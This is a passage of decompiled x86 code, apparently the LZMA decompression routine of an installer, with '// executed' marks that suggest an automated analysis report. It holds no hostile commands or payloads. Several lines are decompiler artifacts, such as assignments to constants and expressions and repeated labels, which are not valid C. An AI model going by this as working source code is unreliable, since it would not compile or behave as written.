                                                                                                                          						 *(_t621 - 0x58) = _t539;
                                                                                                                          						goto L68;
                                                                                                                          					} else {
                                                                                                                          						 *(__ebp - 0x84) = 8;
                                                                                                                          						while(1) {
                                                                                                                          							L132:
                                                                                                                          							 *(_t621 - 0x54) = _t614;
                                                                                                                          							while(1) {
                                                                                                                          								L133:
                                                                                                                          								_t540 =  *_t614;
                                                                                                                          								_t597 = _t540 & 0x0000ffff;
                                                                                                                          								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                                                          								if( *(_t621 - 0xc) >= _t573) {
                                                                                                                          									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                                                          									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                                                          									 *(_t621 - 0x40) = 1;
                                                                                                                          									_t541 = _t540 - (_t540 >> 5);
                                                                                                                          									 *_t614 = _t541;
                                                                                                                          								} else {
                                                                                                                          									 *(_t621 - 0x10) = _t573;
                                                                                                                          									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                          									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                                                          								}
                                                                                                                          								if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                                                          									goto L139;
                                                                                                                          								}
                                                                                                                          								L137:
                                                                                                                          								if( *(_t621 - 0x6c) == 0) {
                                                                                                                          									 *(_t621 - 0x88) = 5;
                                                                                                                          									L170:
                                                                                                                          									_t576 = 0x22;
                                                                                                                          									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                                                                                          									_t544 = 0;
                                                                                                                          									L172:
                                                                                                                          									return _t544;
                                                                                                                          								}
                                                                                                                          								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                                                                                          								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                          								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                          								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                                                          								L139:
                                                                                                                          								_t542 =  *(_t621 - 0x84);
                                                                                                                          								while(1) {
                                                                                                                          									 *(_t621 - 0x88) = _t542;
                                                                                                                          									while(1) {
                                                                                                                          										L1:
                                                                                                                          										_t543 =  *(_t621 - 0x88);
                                                                                                                          										if(_t543 > 0x1c) {
                                                                                                                          											break;
                                                                                                                          										}
                                                                                                                          										switch( *((intOrPtr*)(_t543 * 4 +  &M0040684B))) {
                                                                                                                          											case 0:
                                                                                                                          												if( *(_t621 - 0x6c) == 0) {
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                          												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                          												_t543 =  *( *(_t621 - 0x70));
                                                                                                                          												if(_t543 > 0xe1) {
                                                                                                                          													goto L171;
                                                                                                                          												}
                                                                                                                          												_t547 = _t543 & 0x000000ff;
                                                                                                                          												_push(0x2d);
                                                                                                                          												asm("cdq");
                                                                                                                          												_pop(_t578);
                                                                                                                          												_push(9);
                                                                                                                          												_pop(_t579);
                                                                                                                          												_t617 = _t547 / _t578;
                                                                                                                          												_t549 = _t547 % _t578 & 0x000000ff;
                                                                                                                          												asm("cdq");
                                                                                                                          												_t612 = _t549 % _t579 & 0x000000ff;
                                                                                                                          												 *(_t621 - 0x3c) = _t612;
                                                                                                                          												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                                                                                          												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                                                                                          												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                                                                                          												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                                                                                          													L10:
                                                                                                                          													if(_t620 == 0) {
                                                                                                                          														L12:
                                                                                                                          														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                                                                                          														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                          														goto L15;
                                                                                                                          													} else {
                                                                                                                          														goto L11;
                                                                                                                          													}
                                                                                                                          													do {
                                                                                                                          														L11:
                                                                                                                          														_t620 = _t620 - 1;
                                                                                                                          														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                                                                                          													} while (_t620 != 0);
                                                                                                                          													goto L12;
                                                                                                                          												}
                                                                                                                          												if( *(_t621 - 4) != 0) {
                                                                                                                          													GlobalFree( *(_t621 - 4));
                                                                                                                          												}
                                                                                                                          												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                          												 *(_t621 - 4) = _t543;
                                                                                                                          												if(_t543 == 0) {
                                                                                                                          													goto L171;
                                                                                                                          												} else {
                                                                                                                          													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                                                                                          													goto L10;
                                                                                                                          												}
                                                                                                                          											case 1:
                                                                                                                          												L13:
                                                                                                                          												__eflags =  *(_t621 - 0x6c);
                                                                                                                          												if( *(_t621 - 0x6c) == 0) {
                                                                                                                          													 *(_t621 - 0x88) = 1;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                          												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                                                                                          												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                          												_t45 = _t621 - 0x48;
                                                                                                                          												 *_t45 =  *(_t621 - 0x48) + 1;
                                                                                                                          												__eflags =  *_t45;
                                                                                                                          												L15:
                                                                                                                          												if( *(_t621 - 0x48) < 4) {
                                                                                                                          													goto L13;
                                                                                                                          												}
                                                                                                                          												_t555 =  *(_t621 - 0x40);
                                                                                                                          												if(_t555 ==  *(_t621 - 0x74)) {
                                                                                                                          													L20:
                                                                                                                          													 *(_t621 - 0x48) = 5;
                                                                                                                          													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                                                                                          													goto L23;
                                                                                                                          												}
                                                                                                                          												 *(_t621 - 0x74) = _t555;
                                                                                                                          												if( *(_t621 - 8) != 0) {
                                                                                                                          													GlobalFree( *(_t621 - 8)); // executed
                                                                                                                          												}
                                                                                                                          												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                                                                                          												 *(_t621 - 8) = _t543;
                                                                                                                          												if(_t543 == 0) {
                                                                                                                          													goto L171;
                                                                                                                          												} else {
                                                                                                                          													goto L20;
                                                                                                                          												}
                                                                                                                          											case 2:
                                                                                                                          												L24:
                                                                                                                          												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                                                                                          												 *(_t621 - 0x84) = 6;
                                                                                                                          												 *(_t621 - 0x4c) = _t562;
                                                                                                                          												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                                                                                          												goto L132;
                                                                                                                          											case 3:
                                                                                                                          												L21:
                                                                                                                          												__eflags =  *(_t621 - 0x6c);
                                                                                                                          												if( *(_t621 - 0x6c) == 0) {
                                                                                                                          													 *(_t621 - 0x88) = 3;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                          												_t67 = _t621 - 0x70;
                                                                                                                          												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                                                                                          												__eflags =  *_t67;
                                                                                                                          												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                                                          												L23:
                                                                                                                          												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                                                                                          												if( *(_t621 - 0x48) != 0) {
                                                                                                                          													goto L21;
                                                                                                                          												}
                                                                                                                          												goto L24;
                                                                                                                          											case 4:
                                                                                                                          												L133:
                                                                                                                          												_t540 =  *_t614;
                                                                                                                          												_t597 = _t540 & 0x0000ffff;
                                                                                                                          												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                                                          												if( *(_t621 - 0xc) >= _t573) {
                                                                                                                          													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                                                          													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                                                          													 *(_t621 - 0x40) = 1;
                                                                                                                          													_t541 = _t540 - (_t540 >> 5);
                                                                                                                          													 *_t614 = _t541;
                                                                                                                          												} else {
                                                                                                                          													 *(_t621 - 0x10) = _t573;
                                                                                                                          													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                          													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                                                          												}
                                                                                                                          												if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                                                          													goto L139;
                                                                                                                          												}
                                                                                                                          											case 5:
                                                                                                                          												goto L137;
                                                                                                                          											case 6:
                                                                                                                          												__edx = 0;
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													__eax =  *(__ebp - 4);
                                                                                                                          													__ecx =  *(__ebp - 0x38);
                                                                                                                          													 *(__ebp - 0x34) = 1;
                                                                                                                          													 *(__ebp - 0x84) = 7;
                                                                                                                          													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                          													L132:
                                                                                                                          													 *(_t621 - 0x54) = _t614;
                                                                                                                          													goto L133;
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                          												__esi =  *(__ebp - 0x60);
                                                                                                                          												__cl = 8;
                                                                                                                          												__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                          												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                          												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                          												__ecx =  *(__ebp - 0x3c);
                                                                                                                          												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                          												__ecx =  *(__ebp - 4);
                                                                                                                          												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                          												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                          												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          												if( *(__ebp - 0x38) >= 4) {
                                                                                                                          													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                          													if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                          														_t98 = __ebp - 0x38;
                                                                                                                          														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                          														__eflags =  *_t98;
                                                                                                                          													} else {
                                                                                                                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                          													}
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x38) = 0;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                          												if( *(__ebp - 0x34) == __edx) {
                                                                                                                          													__ebx = 0;
                                                                                                                          													__ebx = 1;
                                                                                                                          													goto L61;
                                                                                                                          												} else {
                                                                                                                          													__eax =  *(__ebp - 0x14);
                                                                                                                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          														__eflags = __eax;
                                                                                                                          													}
                                                                                                                          													__ecx =  *(__ebp - 8);
                                                                                                                          													__ebx = 0;
                                                                                                                          													__ebx = 1;
                                                                                                                          													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          													goto L41;
                                                                                                                          												}
                                                                                                                          											case 7:
                                                                                                                          												goto L0;
                                                                                                                          											case 8:
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													__eax =  *(__ebp - 4);
                                                                                                                          													__ecx =  *(__ebp - 0x38);
                                                                                                                          													 *(__ebp - 0x84) = 0xa;
                                                                                                                          													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                          												} else {
                                                                                                                          													__eax =  *(__ebp - 0x38);
                                                                                                                          													__ecx =  *(__ebp - 4);
                                                                                                                          													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                          													 *(__ebp - 0x84) = 9;
                                                                                                                          													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                          													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                          												}
                                                                                                                          												while(1) {
                                                                                                                          													L132:
                                                                                                                          													 *(_t621 - 0x54) = _t614;
                                                                                                                          													goto L133;
                                                                                                                          												}
                                                                                                                          											case 9:
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													goto L89;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x60);
                                                                                                                          												if( *(__ebp - 0x60) == 0) {
                                                                                                                          													goto L171;
                                                                                                                          												}
                                                                                                                          												__eax = 0;
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                          												__eflags = _t258;
                                                                                                                          												0 | _t258 = _t258 + _t258 + 9;
                                                                                                                          												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                          												goto L75;
                                                                                                                          											case 0xa:
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													__eax =  *(__ebp - 4);
                                                                                                                          													__ecx =  *(__ebp - 0x38);
                                                                                                                          													 *(__ebp - 0x84) = 0xb;
                                                                                                                          													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                          													while(1) {
                                                                                                                          														L132:
                                                                                                                          														 *(_t621 - 0x54) = _t614;
                                                                                                                          														goto L133;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x28);
                                                                                                                          												goto L88;
                                                                                                                          											case 0xb:
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													__ecx =  *(__ebp - 0x24);
                                                                                                                          													__eax =  *(__ebp - 0x20);
                                                                                                                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          												} else {
                                                                                                                          													__eax =  *(__ebp - 0x24);
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x28);
                                                                                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          												L88:
                                                                                                                          												__ecx =  *(__ebp - 0x2c);
                                                                                                                          												 *(__ebp - 0x2c) = __eax;
                                                                                                                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          												L89:
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												 *(__ebp - 0x80) = 0x15;
                                                                                                                          												__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                          												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                          												goto L68;
                                                                                                                          											case 0xc:
                                                                                                                          												L99:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0xc;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t334 = __ebp - 0x70;
                                                                                                                          												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t334;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												__eax =  *(__ebp - 0x2c);
                                                                                                                          												goto L101;
                                                                                                                          											case 0xd:
                                                                                                                          												L37:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0xd;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t122 = __ebp - 0x70;
                                                                                                                          												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t122;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												L39:
                                                                                                                          												__eax =  *(__ebp - 0x40);
                                                                                                                          												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                          													goto L48;
                                                                                                                          												}
                                                                                                                          												__eflags = __ebx - 0x100;
                                                                                                                          												if(__ebx >= 0x100) {
                                                                                                                          													goto L54;
                                                                                                                          												}
                                                                                                                          												L41:
                                                                                                                          												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                          												__ecx =  *(__ebp - 0x58);
                                                                                                                          												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                          												 *(__ebp - 0x48) = __eax;
                                                                                                                          												__eax = __eax + 1;
                                                                                                                          												__eax = __eax << 8;
                                                                                                                          												__eax = __eax + __ebx;
                                                                                                                          												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          												__ax =  *__esi;
                                                                                                                          												 *(__ebp - 0x54) = __esi;
                                                                                                                          												__edx = __ax & 0x0000ffff;
                                                                                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          													__cx = __ax;
                                                                                                                          													 *(__ebp - 0x40) = 1;
                                                                                                                          													__cx = __ax >> 5;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													__ebx = __ebx + __ebx + 1;
                                                                                                                          													 *__esi = __ax;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                          													 *(__ebp - 0x10) = __ecx;
                                                                                                                          													0x800 = 0x800 - __edx;
                                                                                                                          													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                          													__ebx = __ebx + __ebx;
                                                                                                                          													 *__esi = __cx;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          												 *(__ebp - 0x44) = __ebx;
                                                                                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          													goto L39;
                                                                                                                          												} else {
                                                                                                                          													goto L37;
                                                                                                                          												}
                                                                                                                          											case 0xe:
                                                                                                                          												L46:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0xe;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t156 = __ebp - 0x70;
                                                                                                                          												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t156;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												while(1) {
                                                                                                                          													L48:
                                                                                                                          													__eflags = __ebx - 0x100;
                                                                                                                          													if(__ebx >= 0x100) {
                                                                                                                          														break;
                                                                                                                          													}
                                                                                                                          													__eax =  *(__ebp - 0x58);
                                                                                                                          													__edx = __ebx + __ebx;
                                                                                                                          													__ecx =  *(__ebp - 0x10);
                                                                                                                          													__esi = __edx + __eax;
                                                                                                                          													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          													__ax =  *__esi;
                                                                                                                          													 *(__ebp - 0x54) = __esi;
                                                                                                                          													__edi = __ax & 0x0000ffff;
                                                                                                                          													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          													if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          														__cx = __ax;
                                                                                                                          														_t170 = __edx + 1; // 0x1
                                                                                                                          														__ebx = _t170;
                                                                                                                          														__cx = __ax >> 5;
                                                                                                                          														__eflags = __eax;
                                                                                                                          														 *__esi = __ax;
                                                                                                                          													} else {
                                                                                                                          														 *(__ebp - 0x10) = __ecx;
                                                                                                                          														0x800 = 0x800 - __edi;
                                                                                                                          														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          														__ebx = __ebx + __ebx;
                                                                                                                          														 *__esi = __cx;
                                                                                                                          													}
                                                                                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          													 *(__ebp - 0x44) = __ebx;
                                                                                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          														continue;
                                                                                                                          													} else {
                                                                                                                          														goto L46;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												L54:
                                                                                                                          												_t173 = __ebp - 0x34;
                                                                                                                          												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                          												__eflags =  *_t173;
                                                                                                                          												goto L55;
                                                                                                                          											case 0xf:
                                                                                                                          												L58:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0xf;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t203 = __ebp - 0x70;
                                                                                                                          												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t203;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												L60:
                                                                                                                          												__eflags = __ebx - 0x100;
                                                                                                                          												if(__ebx >= 0x100) {
                                                                                                                          													L55:
                                                                                                                          													__al =  *(__ebp - 0x44);
                                                                                                                          													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                          													goto L56;
                                                                                                                          												}
                                                                                                                          												L61:
                                                                                                                          												__eax =  *(__ebp - 0x58);
                                                                                                                          												__edx = __ebx + __ebx;
                                                                                                                          												__ecx =  *(__ebp - 0x10);
                                                                                                                          												__esi = __edx + __eax;
                                                                                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          												__ax =  *__esi;
                                                                                                                          												 *(__ebp - 0x54) = __esi;
                                                                                                                          												__edi = __ax & 0x0000ffff;
                                                                                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          													__cx = __ax;
                                                                                                                          													_t217 = __edx + 1; // 0x1
                                                                                                                          													__ebx = _t217;
                                                                                                                          													__cx = __ax >> 5;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													 *__esi = __ax;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x10) = __ecx;
                                                                                                                          													0x800 = 0x800 - __edi;
                                                                                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          													__ebx = __ebx + __ebx;
                                                                                                                          													 *__esi = __cx;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          												 *(__ebp - 0x44) = __ebx;
                                                                                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          													goto L60;
                                                                                                                          												} else {
                                                                                                                          													goto L58;
                                                                                                                          												}
                                                                                                                          											case 0x10:
                                                                                                                          												L109:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0x10;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t365 = __ebp - 0x70;
                                                                                                                          												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t365;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												goto L111;
                                                                                                                          											case 0x11:
                                                                                                                          												L68:
                                                                                                                          												_t614 =  *(_t621 - 0x58);
                                                                                                                          												 *(_t621 - 0x84) = 0x12;
                                                                                                                          												while(1) {
                                                                                                                          													L132:
                                                                                                                          													 *(_t621 - 0x54) = _t614;
                                                                                                                          													goto L133;
                                                                                                                          												}
                                                                                                                          											case 0x12:
